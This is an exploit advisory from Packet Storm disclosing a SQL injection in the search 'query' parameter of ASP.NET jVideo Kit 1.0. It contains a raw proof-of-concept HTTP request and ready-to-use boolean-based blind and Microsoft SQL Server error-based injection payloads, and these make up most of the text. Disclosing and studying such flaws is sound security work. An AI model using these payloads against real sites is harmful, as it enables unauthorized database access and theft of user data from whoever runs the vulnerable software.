ASP.NET jVideo Kit 1.0 SQL Injection

2018-05-24T00:00:00
ID PACKETSTORM:147855
Type packetstorm
Reporter Ozkan Mustafa Akkus
Modified 2018-05-24T00:00:00

Description

                                        
                                            `# Exploit Title: ASP.NET jVideo Kit - 'query' SQL Injection  
# Dork: N/A  
# Date: 23.05.2018  
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)  
# Vendor: MediaSoft Pro  
# Vendor Homepage: https://www.mediasoftpro.com/video-sharing-script/mvc/  
# Version: v1.0  
# Category: Webapps  
# Tested on: Kali linux  
# Description : The vulnerability allows an attacker to inject sql commands  
from the search section with 'query' parameter. You can use the GET or POST  
methods.  
====================================================  
  
# PoC : SQLi :  
  
# GET : http://test.com/search?query=[SQL]  
# POST : http://test.com/search  
POST /search HTTP/1.1  
Host: test.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101  
Firefox/45.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://test.com/login  
Cookie: ASP.NET_SessionId=wxim4xkwgxvhtu5k3pvevc3o;  
__RequestVerificationToken=iuu_Y6Xm3aOzaKj3EfCyE_-eT-Ff_lRdBMBZzyFRszSTGdNcaY2w5pH7ck0WZ2egIX3R18UlpXkr8pe_kxw6Ic2g1M-Cmz4woLsU6RRMV3M1  
  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 10  
Query=test  
  
  
# Vulnerable Payload :  
  
Parameter: query (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: query=test%' AND 3923=3923 AND '%'='  
  
Type: error-based  
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING  
clause (IN)  
Payload: query=test%' AND 1603 IN (SELECT  
(CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN  
(1603=1603) THEN CHAR(49) ELSE CHAR(48)  
END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) AND '%'='  
  
  
====================================================  
  
`